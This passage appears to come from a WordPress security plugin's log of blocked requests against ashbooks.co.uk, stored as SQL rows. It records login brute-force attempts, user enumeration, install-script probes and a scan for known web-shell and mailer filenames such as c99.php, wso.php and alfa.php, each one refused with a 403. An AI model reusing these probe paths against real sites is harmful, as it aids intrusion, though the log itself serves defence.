Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','d2G9WxYVlhUsMHiTpJQOkI4w',0,1636316589.5114,9882,'','POST',403,0,600,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/xmrlpc.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident\\/5.0)\"}','9NpwOnJf76oBDg1Pt4XGd8rm',0,1636318576.1942,642,'','GET',403,0,700,0,1,'',0),('174.138.28.238',2928286958,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','98CN1busMfxdweOSLKQVZU3t',0,1636320936.7755,167,'','GET',403,0,520,0,1,'',0),('174.138.28.238',2928286958,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','vOxfJVbW51ngp9wsYmQDMz02',0,1636320960.8739,170,'','GET',403,0,520,0,1,'',0),('82.165.222.205',1386602189,'','https://ashbooks.co.uk/cgi-bin/mt/mt-atom.cgi','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"bluehost.com\"}','B9WlA50YnX8VgdZe1oTxOaQR',0,1636328875.7997,443,'','GET',403,0,700,0,1,'',0),('82.165.222.205',1386602189,'','https://ashbooks.co.uk/mt/mt-atom.cgi','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"bluehost.com\"}','mtlM6n0NKuBDQboY7pFeEPiH',0,1636328882.2695,400,'','GET',403,0,700,0,1,'',0),('82.165.222.205',1386602189,'','https://ashbooks.co.uk/cgi-bin/mt-atom.cgi','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"bluehost.com\"}','oCMtQ4Bk1rYiDAEN0g3OelmT',0,1636328888.4449,167,'','GET',403,0,700,0,1,'',0),('82.165.222.205',1386602189,'','https://ashbooks.co.uk/cgi-bin/MT/mt-atom.cgi','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"bluehost.com\"}','7IrwGtYgbJulz8j6MeVapodx',0,1636328894.4053,423,'','GET',403,0,700,0,1,'',0),('82.165.222.205',1386602189,'','https://ashbooks.co.uk/MT/mt-atom.cgi','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"bluehost.com\"}','nIwASVXH8UKxm3oOYbWDuT6k',0,1636328900.4213,408,'','GET',403,0,700,0,1,'',0),('82.165.222.205',1386602189,'','https://ashbooks.co.uk/mt-atom.cgi','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"bluehost.com\"}','4sTi2VG51XScMa38FfZb9kWC',0,1636328906.0161,434,'','GET',403,0,700,0,1,'',0),('45.158.15.145',765333393,'','https://ashbooks.co.uk/wp-admin/css/colors/blue/blue/index.php?ARRAY=5o313636353136373032382p22687474703n5p2s5p2s646s6p61726o7572756q2r636s6q5p2s7465737477722r706870225q&id=4152','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','T149gubkPzp6ehc5l0HEO8Ld',0,1636338017.0192,1101,'','GET',403,0,700,0,1,'',0),('20.65.209.30',339857694,'','https://ashbooks.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tQbgaUlYcGVrmI7jZ05WueCD',0,1636340779.6969,4355,'','GET',403,0,700,0,1,'',0),('212.192.246.199',3569415879,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.106 Safari\\/537.36\"}','85ZBMDIbA29LiXKJFhVTGsCg',0,1636343743.5723,178,'','GET',403,0,520,0,1,'',0),('136.144.41.14',2291149070,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.106 Safari\\/537.36\"}','W65oTlpEkG3cgFS0bBePLn19',0,1636345572.0841,437,'','GET',403,0,520,0,1,'',0),('69.30.217.110',1159649646,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Ubuntu Chromium\\/36.0.1985.125 Chrome\\/36.0.1985.125 Safari\\/537.36\"}','BAldNEL8gmtMhU20Y5XefTzv',0,1636351819.4417,190,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','b2sTc3EYxeiSt5d1NhPV6Ozk',0,1636354410.1318,451,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','QY3CVxWOLHFjJuw86mKBckPf',0,1636365208.2186,828,'','POST',403,0,600,0,1,'',0),('137.184.117.45',2310567213,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','VF4suLeJZpd9lRHzkfinoQcB',0,1636370753.4150,5477,'','GET',403,0,520,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','D1dcBACm8rO7M5ihegYU2uvX',0,1636375972.6153,1020,'','POST',403,0,600,0,1,'',0),('64.227.53.63',1088632127,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','4gFhRL5ConWS1ke8Bz6V0bJE',0,1636385432.1715,374,'','GET',403,0,520,0,1,'',0),('64.227.53.63',1088632127,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','YujBv0eLhVzwNMmUCcPsl8W3',0,1636385432.2009,683,'','GET',403,0,520,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','ltQFSwuH6PV14e7f9LNjMWyv',0,1636386560.8256,470,'','POST',403,0,600,0,1,'',0),('167.172.135.70',2813101894,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','it0oSO6Qavjb2s3Y5HDqdgxL',0,1636390702.6999,433,'','GET',403,0,520,0,1,'',0),('20.108.254.25',342687257,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','lyq3grQ2nmxVRCBcUIp4J91z',0,1636391759.4410,152,'','GET',403,0,520,0,1,'',0),('192.187.118.203',3233511115,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit\\/537.51.1 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11B554a Safari\\/9537.53\"}','zi5YTntfa2rDUI1x6vXM4PKS',0,1636393275.3408,442,'','POST',403,0,600,0,1,'',0),('104.168.174.187',1755885243,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','9shjrI8TSmB1FCt2lAuovPfE',0,1636395166.4952,2460,'','GET',403,0,520,0,1,'',0),('104.168.174.187',1755885243,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','wcSZ3k8impD2JyleIzvC6hrb',0,1636395172.5241,791,'','GET',403,0,520,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','C8k3bB4I0ayUSscAtJ9VFxEW',0,1636397219.6898,459,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','mwOLByKP7pGV0RUxMIN5Zht3',0,1636407965.2441,552,'','POST',403,0,600,0,1,'',0),('174.138.28.238',2928286958,'','https://ashbooks.co.uk//new/wp-admin/install.php?step=1','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','2igICMJcj5Aeu7rG8HEzq1T3',0,1636408121.5826,407,'','GET',403,0,700,0,1,'',0),('174.138.28.238',2928286958,'','https://ashbooks.co.uk//wp/wp-admin/install.php?step=1','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','zHxIsiRqE0VtlCYdb2MDQUny',0,1636408123.5318,1402,'','GET',403,0,700,0,1,'',0),('174.138.28.238',2928286958,'','https://ashbooks.co.uk//wordpress/wp-admin/install.php?step=1','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','p4kIDxgNw8lZdPKcX3jRTaS2',0,1636408125.9972,412,'','GET',403,0,700,0,1,'',0),('174.138.28.238',2928286958,'','https://ashbooks.co.uk//new/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','zrM4K1OAesvlbIWYh27uERfZ',0,1636408133.2169,432,'','GET',403,0,700,0,1,'',0),('174.138.28.238',2928286958,'','https://ashbooks.co.uk//wp/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','TxKfINPB9dVFqc3btho6Y17W',0,1636408134.7836,383,'','GET',403,0,700,0,1,'',0),('174.138.28.238',2928286958,'','https://ashbooks.co.uk//wordpress/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','F1KkDYqw6NcM9WdnpVJl0s8x',0,1636408136.2415,422,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/shell4.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xRz3sclAdgJoSvZCEVtQHe8b',0,1636408351.7606,223,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Vqyf27uPAHQwsW5eKgjSh9dG',0,1636408352.0814,420,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/ru.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GLYu08gXbHIp6wqxctvos3SP',0,1636408352.6798,132,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','euJECPVatxZ9vhlYIbOq21pK',0,1636408352.9065,135,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8xReAhOuSNB7ztDkwcUjIXvo',0,1636408353.1654,296,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','quhAOHf0t4RiocVaJ3lFMzP8',0,1636408353.6219,157,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/skipper.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QtLpNXdcBEeYgvAswOIZS9Pr',0,1636408353.8684,151,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/skippershell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wiaSkUqoR2uM9AFd56f3xTVJ',0,1636408354.1133,461,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/tttt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uxlfYH3BIT5Syv1RaCOdZsNg',0,1636408354.6771,172,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/tshop.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PALtvwI731OTVf6GokKUbYHc',0,1636408354.9345,169,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JVRqy2en4jEYBil8dg9fp6PH',0,1636408355.2115,417,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZNxVBRMS46zDCvQXJ2fq9EhO',0,1636408355.7224,141,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/inje3ctor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tqYcZUzwxmliMbnkg4Eo7ed8',0,1636408355.9678,153,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/saudi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ofIsPFYOj18ZRG9BahLXkgTr',0,1636408356.2325,426,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VO08MdwgvePYBIk9s2uDGJb7',0,1636408356.7543,157,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/alfashell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TODPyxu9jHQJClW5ka3VbrvN',0,1636408357.0098,384,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/my_alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iwVmhpWREUsKdkrvYgHXL15y',0,1636408357.4779,139,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vAyol5nGBzRSkE6HDCO1wNh8',0,1636408357.7216,132,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','B3q91ePa8lJ0sQmkFhypUtCV',0,1636408357.9373,159,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/hacked.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oRB8slO6f2ptYgeM40E9SJWz',0,1636408358.1889,399,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Lh614jNJERfAs7PT8VanBwGK',0,1636408358.6728,247,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bfLd6RgiUztyEI8AJCwX1lF5',0,1636408359.0351,391,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/Navir.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vD1a8HjmuhcX2FqTonz946RP',0,1636408359.5248,140,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/cmd13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CTBHKyud9SV3bRNw8OJUlYFW',0,1636408359.7686,174,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/inc20k1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CPVwtXcWhrkMbLiFQTD724Y8',0,1636408360.0418,387,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WQaYTElHBwDmyXCd6qVIZ31k',0,1636408360.5228,126,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AndXi2GLwvaOCMFsV7p0lPtU',0,1636408360.7491,138,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','S3g6K1OeR7FixPZyIcG4lbuE',0,1636408360.9747,135,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xTZsWUNPreJuDkXf2yv7LMpb',0,1636408361.2000,382,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HKW8GjuU2l0xmMcTpINzri1b',0,1636408361.6694,127,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WuQvaLYpt9IbS1lCB2OVoN8n',0,1636408361.8936,127,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fSxndk8F0AptZ3VUMaJ4rQgT',0,1636408362.1164,391,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0Yptm4K3aVUueG15jF9LWPZC',0,1636408362.6008,137,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/edit-form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','FknuqR9XENdjcZz50bADOHtB',0,1636408362.8389,154,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/LEAF.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tHRwZjOsI6J0giV2C71zAa5k',0,1636408363.0843,394,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SdgQO6icKRe4tx7VmZvqDy2P',0,1636408363.5696,123,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tmlTd0eEWgKJNx51vUu26qcP',0,1636408363.7843,138,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nuwbBXG7azqRfpHx2lcsI9oe',0,1636408364.0303,430,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/Leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','auWe5mg3bE7pHIUB9hYdXPTS',0,1636408364.5670,124,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yLpdjYOJlCk8DIbZ43zwoRXh',0,1636408364.7754,135,'','GET',403,0,700,0,1,'',0),('35.175.188.167',598719655,'','https://ashbooks.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SOxCUpfbF9A38eyXEZaj4ul5',0,1636408364.9941,122,'','GET',403,0,700,0,1,'',0),('104.219.251.41',1759247145,'','https://ashbooks.co.uk/info.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','Ke9H50Bdnr2yCOmAisDSRJoG',0,1636410388.6298,395,'','GET',403,0,700,0,1,'',0),('104.219.251.41',1759247145,'','https://ashbooks.co.uk/phpinfo.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','2NYx4zEraefdKOmVt7nSDw3A',0,1636410391.2404,414,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XQmwjBs39fapMgFSxVK6HrTI',0,1636414713.6890,148,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IyJmwZc5vlh7Vu6Gq4BUQ1dr',0,1636414714.1318,409,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 